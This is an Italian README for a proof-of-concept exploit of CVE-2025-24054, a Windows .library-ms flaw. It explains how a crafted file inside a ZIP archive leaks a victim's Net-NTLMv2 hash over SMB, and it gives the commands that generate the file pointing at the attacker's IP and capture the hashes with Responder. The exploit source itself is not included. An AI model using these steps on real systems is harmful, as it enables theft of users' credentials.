
Proof-of-concept exploit per CVE-2025-24054, una vulnerabilità di divulgazione hash NTLM di Windows Library (.library-ms). Genera un file .library-ms dannoso per divulgare hash Net-NTLMv2 tramite SMB quando estratto da un archivio ZIP.
Una semplice Prova di Concetto per CVE-2025-24054 – Vulnerabilità di Divulgazione dell'Hash NTLM di Windows Library (.library-ms).
⚠️ Solo per uso educativo e di laboratorio autorizzato
CVE-2025-24054 consente a un attaccante di forzare un sistema Windows a divulgare l'hash Net-NTLMv2 della vittima utilizzando un file .library-ms appositamente creato.
Quando la vittima estrae un archivio ZIP contenente il file .library-ms malevolo, Windows Explorer avvia automaticamente una connessione SMB, divulgando l'hash NTLM.
.library-ms malevolo contenente un percorso UNC che punta alla propria macchina.
python poc.py -i YOUR-IP
sudo responder -I eth0